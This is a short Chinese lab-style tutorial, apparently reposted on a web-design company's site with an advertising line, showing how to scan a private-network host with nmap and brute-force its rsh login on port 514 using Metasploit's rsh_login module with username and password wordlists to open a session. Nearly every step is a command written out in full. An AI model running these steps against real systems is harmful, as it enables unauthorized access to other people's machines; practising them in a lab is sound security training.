一、利用nmap工具扫描目标主机

成都创新互联自2013年起，先为疏附等服务建站，疏附等地企业，进行企业商务咨询服务。为疏附企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

1.1使用nmap命令对目标主机进行扫描。

1.2在终端中输入命令“nmap –sV  192.168.1.3”，对目标主机进行端口扫描，发现开放514端口，开放tcpwrapped服务。

1.3在终端中输入命令“msfconsole”，启动MSF终端。

1.4在终端中输入命令“search rsh_login”，搜索rsh_login的相关工具和***载荷。

1.5在终端中输入命令“use auxiliary/scanner/rservices/rsh_login”，启用漏洞利用模块, 提示符就会提示进入到该路径下。

1.6在终端中输入命令“set RHOST 192.168.1.3”，设置目标主机的IP地址。

1.7在终端中输入命令“set RPORT 514”，设置目标主机的端口号。

1.8在终端中输入“set PASS_FILE /home/passwd.txt”,设置破解使用的密码文件。

1.9在终端中输入“set USER_FILE /home/user.txt”, 设置破解使用的登录用户名文件。

1.10在终端中输入“exploit”, 开始向目标主机***，会话建立，表示溢出成功。

1.11在终端中输入“sessions”,查看会话数。

文章题目：Metasploit爆破tcpwrapped服务
地址分享：http://scyingshan.cn/article/gjjoee.html